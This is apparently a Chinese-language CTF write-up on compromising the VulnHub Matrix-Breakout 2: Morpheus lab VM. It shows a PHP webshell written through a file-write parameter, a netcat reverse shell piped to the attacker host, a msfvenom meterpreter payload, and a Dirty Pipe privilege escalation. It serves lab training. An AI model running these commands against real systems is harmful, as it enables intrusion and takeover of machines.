攻击机:10.10.10.129
靶机:10.10.10.132
靶机下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
一、信息收集
1、nmap -sn 10.10.10.0/24
先用nmap扫下攻击机同网段,得到靶机地址10.10.10.132
2、nmap -Pn -A -p- 10.10.10.132
,先用nmap进行初步的信息收集
3、开放了3个端口,22端口没有发现利用点。80端口是一个网页,只有一段话和一张图片。81端口是个登录界面。
4、80端口界面看了下源码没发现利用点,简单进行下目录扫描
5、80端口界面暂未发现什么可利用目录,先放着。81端口界面是个登录界面可能存在账号爆破或sql注入。进行一番测试和爆破后还有没有新发现。于是对81端口界面也进行了一波目录扫描,依旧没有新发现
6、既然81端口登录界面不是突破口,估计又是存在某个隐藏目录。于是使用kali上自带的字典重新进行了一波目录扫描,dirsearch -u http://10.10.10.132/ -w /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt -t 100 -o 1.txt
7、依旧没扫出来,于是打算换个字典试一下,结果所有字典都试了也没有新发现。然后就想着进行一波指纹扫描,也许是利用什么cms漏洞之类的
8、依旧是没有什么新进展,然后去看了下别人的write up,别人就是扫出了一个隐藏文件。这里一直想不明白我怎么扫不出来,后来才发现我使用的dirsearch 扫描时没有将后缀名拼接扫描文件,只扫描了目录。于是改用了gobuster重新进行扫描。gobuster 需要指定文件类型,由于不知道网站使用什么语言所以都指定了一遍。gobuster dir -u http://10.10.10.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,jsp,aspx,asp,js
9、扫出来两个文件,graffiti.txt目前没啥利用点。graffiti.php有一个输入框
二、漏洞利用
1、经测试在文本框输入会直接在当前页面打印出来,而且存在存储型xss。试着写了一句话木马过去,但查看网页源码发现会在<?之间插入!--,使之成为一个注释
2、然后找了个不用?的一句话木马,虽然没有被过滤但是无法连接<script language="pHp">@eval(['a'])</script>
3、抓包看了下,发现请求包存在两个参数。一个是message,值是我们发送的信息;一个是file,file的值等于graffiti.txt。然后又重新查看了下graffiti.txt这个文件,发现之前测试的数据都被写进了这里
4、将file的值改成graffiti.php重新写入一句话木马,蚁剑成功上线。后面测试如果将file的值改成一个不存在文件名,它会自动生成这个文件,也可以成功上线
三、内网信息收集
1、简单查了下当前用户信息
2、查看了下passwd、shadow文件权限都为root
3、find / -perm -u=s -type f 2>/dev/null
,没发现可以suid提权的命令
4、sudoeidt -s /
,suodo提权也无法使用
5、这里可以直接上传linux提权辅助工具来寻找其他漏洞提权,linux提权辅助工具下载地址:https://github.com/The-Z-Labs/linux-exploit-suggester,但我比较喜欢使用msf中的local_exploit_suggester 这个模块来辅助提权。如果是直接上传的话,后面如果要反弹shell到攻击机上,靶机上nc反弹无法使用e参数。这里介绍一个新的nc反弹,不需要e参数。首先在攻击机上用nc开启两个监听端口。
6、nc 10.10.10.129 4444 | /bin/bash | nc 10.10.10.129 5555
,在蚁剑上执行就可以成功反弹shell。在4444端口输入命令,5555端口显示结果
四、权限提升
1、首先在msf中开启一个监听端口
2、msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.10.129 lport=4444 -f elf > 4444.elf
,生成一个msf的木马,payload要与上面监听事件的payload相同。然后上传到靶机执行。一般tmp目录拥有高权限,所以上传到tmp目录下执行
3、成功上线后,输入bg先将这个会话放后台。然后使用msf中的提权辅助模块
4、设置下必要参数然后执行等待
5、这里使用第一个漏洞模块
6、use exploit/linux/local/cve_2022_0847_dirtypipe
7、设置下必要参数,下面payload的端口需要改下,4444端口已经被我们使用了
五、get flag
1、获得会话后,查看下权限是root。切换到shell模式,然后在root目录下获得flag
六、总结
这个靶机还是挺简单的,先目录扫描出隐藏文件,然后上传木马getshell,最后借助msf使用cve-2022-0847提权获得flag。难点可能在于那个隐藏文件扫不出来,还有学习了nc不用e参数反弹shell。